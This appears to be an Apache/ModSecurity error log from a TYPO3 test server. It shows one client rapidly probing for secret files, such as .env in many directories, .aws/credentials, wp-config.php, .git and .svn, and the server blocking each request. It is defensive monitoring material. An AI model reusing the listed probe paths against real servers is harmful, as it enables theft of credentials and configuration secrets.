[Wed Apr 02 08:48:15.644266 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM5AAAAAk"]
[Wed Apr 02 08:48:15.644425 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM5AAAAAk"]
[Wed Apr 02 08:48:15.671997 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM5QAAAAk"]
[Wed Apr 02 08:48:15.672364 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM5QAAAAk"]
[Wed Apr 02 08:48:15.672695 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-zdr_es8FvEReXz3ciM5QAAAAk"]
[Wed Apr 02 08:48:15.969649 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Wed Apr 02 08:48:15.996070 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 02 08:48:16.112237 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.ini
[Wed Apr 02 08:48:16.182608 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-zdsPes8FvEReXz3ciM7QAAAAk"]
[Wed Apr 02 08:48:16.182848 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-zdsPes8FvEReXz3ciM7QAAAAk"]
[Wed Apr 02 08:48:16.183040 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-zdsPes8FvEReXz3ciM7QAAAAk"]
[Wed Apr 02 08:48:16.428515 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 02 08:48:16.459093 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Wed Apr 02 08:48:16.538721 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Wed Apr 02 08:48:16.565463 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-zdsPes8FvEReXz3ciM9wAAAAk"]
[Wed Apr 02 08:48:16.565696 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-zdsPes8FvEReXz3ciM9wAAAAk"]
[Wed Apr 02 08:48:16.565850 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-zdsPes8FvEReXz3ciM9wAAAAk"]
[Wed Apr 02 08:48:16.592181 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-zdsPes8FvEReXz3ciM-AAAAAk"]
[Wed Apr 02 08:48:16.592399 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-zdsPes8FvEReXz3ciM-AAAAAk"]
[Wed Apr 02 08:48:16.592560 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-zdsPes8FvEReXz3ciM-AAAAAk"]
[Wed Apr 02 08:48:16.749302 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-zdsPes8FvEReXz3ciM_AAAAAk"]
[Wed Apr 02 08:48:16.749655 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-zdsPes8FvEReXz3ciM_AAAAAk"]
[Wed Apr 02 08:48:16.749821 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-zdsPes8FvEReXz3ciM_AAAAAk"]
[Wed Apr 02 08:48:16.776129 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Wed Apr 02 08:48:16.848064 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-zdsPes8FvEReXz3ciM_wAAAAk"]
[Wed Apr 02 08:48:16.848291 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-zdsPes8FvEReXz3ciM_wAAAAk"]
[Wed Apr 02 08:48:16.848483 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-zdsPes8FvEReXz3ciM_wAAAAk"]
[Wed Apr 02 08:48:17.006639 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-zdsfes8FvEReXz3ciNAwAAAAk"]
[Wed Apr 02 08:48:17.006884 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-zdsfes8FvEReXz3ciNAwAAAAk"]
[Wed Apr 02 08:48:17.007093 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-zdsfes8FvEReXz3ciNAwAAAAk"]
[Wed Apr 02 08:48:17.034050 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-zdsfes8FvEReXz3ciNBAAAAAk"]
[Wed Apr 02 08:48:17.034315 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-zdsfes8FvEReXz3ciNBAAAAAk"]
[Wed Apr 02 08:48:17.034502 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-zdsfes8FvEReXz3ciNBAAAAAk"]
[Wed Apr 02 08:48:17.388259 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:17.416348 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-zdsfes8FvEReXz3ciNBgAAAAk"]
[Wed Apr 02 08:48:17.416607 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-zdsfes8FvEReXz3ciNBgAAAAk"]
[Wed Apr 02 08:48:17.416779 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-zdsfes8FvEReXz3ciNBgAAAAk"]
[Wed Apr 02 08:48:17.442820 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:17.469087 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:17.495374 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 08:48:17.521897 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Wed Apr 02 08:48:17.680286 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-zdsfes8FvEReXz3ciNDgAAAAk"]
[Wed Apr 02 08:48:17.680542 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-zdsfes8FvEReXz3ciNDgAAAAk"]
[Wed Apr 02 08:48:17.680713 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-zdsfes8FvEReXz3ciNDgAAAAk"]
[Wed Apr 02 08:48:17.753639 2025] [php:error] [pid 2192748] [client 154.83.103.10:30420] script '/var/www/surf/TYPO3/public/typo3conf/localconf.php' not found or unable to stat
[Wed Apr 02 08:48:17.873477 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Wed Apr 02 08:48:17.993590 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Wed Apr 02 08:48:18.330700 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-zdsves8FvEReXz3ciNHgAAAAk"]
[Wed Apr 02 08:48:18.330947 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-zdsves8FvEReXz3ciNHgAAAAk"]
[Wed Apr 02 08:48:18.331126 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-zdsves8FvEReXz3ciNHgAAAAk"]
[Wed Apr 02 08:48:18.602813 2025] [authz_core:error] [pid 2192748] [client 154.83.103.10:30420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Wed Apr 02 08:48:18.629550 2025] [:error] [pid 2192748] [client 154.83.103.10:30420] [client 154.83.103.10] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-zdsves8FvEReXz3ciNIQAAAAk"]
